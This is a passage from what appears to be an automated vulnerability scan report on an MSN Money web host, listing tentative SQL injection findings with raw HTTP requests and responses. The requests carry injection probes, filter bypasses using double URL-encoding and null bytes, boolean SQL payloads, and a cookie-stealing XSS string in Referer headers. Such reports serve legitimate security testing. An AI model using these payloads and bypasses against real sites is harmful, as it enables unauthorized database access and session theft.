Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041%2527; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:18 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /detail/stock_quote?symbol= HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041%2527%2527; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 02:16:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://investing.money.redacted/investments/stock-price
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price">here</a>.</h2>
</body></html>

1.23. http://redacted/detail/stock_quote [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/detail/stock_quote

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /detail/stock_quote HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:12 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 02:16:13 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://investing.money.redacted/investments/stock-price
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price">here</a>.</h2>
</body></html>

1.24. http://redacted/detail/stock_quote [Sample cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/detail/stock_quote

Issue detail

The Sample cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Sample cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Sample cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /detail/stock_quote HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:1a400"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Date: Sun, 30 Jan 2011 02:13:55 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /detail/stock_quote HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69%2527%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 02:13:55 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://investing.money.redacted/investments/stock-price
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price">here</a>.</h2>
</body></html>

1.25. http://redacted/detail/stock_quote [expid cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/detail/stock_quote

Issue detail

The expid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the expid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the expid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /detail/stock_quote?Symbol=$INDU HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2%2527;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:19 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 02:16:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://investing.money.redacted/investments/stock-price?symbol=%24INDU
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 186

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price?symbol=%24INDU">here</a>.</h2>
</body></html>

1.26. http://redacted/detail/stock_quote [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/detail/stock_quote

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /detail/stock_quote?Symbol=$INDU&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:23 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /detail/stock_quote?Symbol=$INDU&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:153c9"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:24 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css></STYLE>

<HTML><HEAD><TITLE>MSN Money</TITLE>
<META HTTP-EQUIV="Expires" CONTENT="Fri, 01 Jan 1999 12:00:00 GMT">
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="cache-control" CONTENT="private">
<SCRIPT TYPE="text/javascript">
   function body_load()
   {
       var re = /^.*GUID=([a-f|\d]{32}).*$/i;
       var matches = re.exec( document.cookie );
       if( matches == null )
           return;

       var host = document.location.hostname;
       var domain = null;

       if( host.indexOf('.redacted') != -1 )
       {
           domain = 'redacted';
       }
       if( domain == null )
       {
           return;
       }

       var guid = matches[1].toLowerCase();
       if( guid == '25c836ef9256475d91344c42b54a03f9' || guid == '0f868cfe997d4557b8112a3dfaa2a8e4' )
       {
           document.domain = domain;
           document.cookie = 'MC1=;expires=Fri, 31 Dec 1999; 00:00:00 GMT; domain=' + domain;
           if( document.referrer == null || document.referrer == '' )
           {
               document.location.href = 'http://moneycentral.msn.com';
           }
           else
           {
               document.location.href = document.referrer;
           }
       }
   }
</SCRIPT>

</HEAD>
<BODY TOPMARGIN=0 LEFTMARGIN=0 MARGINHEIGHT=0 MARGINWIDTH=0 BGCOLOR=WHITE TEXT=#333333 LINK=#07519A ALINK=#07519A VLI
...[SNIP]...

1.27. http://redacted/inc/Attributions.asp [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/inc/Attributions.asp

Issue detail

Request 1

GET /inc/Attributions.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:17 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Attributions.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:16:18 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Length: 26240
Content-Type: text/html
Expires: Sun, 30 Jan 2011 02:16:18 GMT
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<tit
...[SNIP]...

1.28. http://redacted/inc/Views/Shared/Core/Content/js/async/jasync.js [userCh cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/inc/Views/Shared/Core/Content/js/async/jasync.js

Issue detail

The userCh cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the userCh cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the userCh cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/async/jasync.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0%2527; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:57:14 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/async/jasync.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0%2527%2527; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:29 GMT
Accept-Ranges: bytes
ETag: "80ccc6bfb8abcb1:153c9"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:57:13 GMT
Content-Length: 2177

(function($)
{var defaults={timeout:50};var pending={};var pollList=[];var waitList=[];var timerId;var $isString=$.isString;var $isFunction=$.isFunction;var w=window;function async(test,action,url)
...[SNIP]...

1.29. http://redacted/inc/Views/Shared/Core/Content/js/hotmaildata/getmaildata.js [s_sq cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/inc/Views/Shared/Core/Content/js/hotmaildata/getmaildata.js

Issue detail

The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /inc/Views/Shared/Core/Content/js/hotmaildata/getmaildata.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D%00'

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:56:28 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:30 GMT
Accept-Ranges: bytes
ETag: "0635fc0b8abcb1:1427c"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:56:27 GMT
Content-Length: 1576

(function($)
{var defaults={proxyurl:'http://hotmailproxy.redacted/pm/v1.0/getheaders.aspx',canaryCookie:'WLMMAC',signedIn:$.signedIn,listlen:3,retries:2,domain:'http://mail.live.com/'};var subscrib
...[SNIP]...

1.30. http://redacted/inc/Views/Shared/Core/Content/js/hotmaildata/unreadcount.js [CC cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/inc/Views/Shared/Core/Content/js/hotmaildata/unreadcount.js

Issue detail

The CC cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CC cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the CC cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/hotmaildata/unreadcount.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US%2527; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:56:23 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/hotmaildata/unreadcount.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US%2527%2527; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:31 GMT
Accept-Ranges: bytes
ETag: "80f9f7c0b8abcb1:161bf"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:56:23 GMT
Content-Length: 495

(function($)
{var defaults={hmtemplate:'{0} ({1})',maxcount:9999};$.fn.unreadCount=function(options)
{var settings=$.extend(true,{},defaults,options);return this.each(function()
{var $hotmail=$(t
...[SNIP]...

1.31. http://redacted/inc/Views/Shared/Core/Content/js/utilities/cookies.js [MC1 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://moneycentral.msn.com
Path:	/inc/Views/Shared/Core/Content/js/utilities/cookies.js

Issue detail

The MC1 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MC1 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the MC1 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/utilities/cookies.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:24 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/utilities/cookies.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527%2527; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:32 GMT
Accept-Ranges: bytes
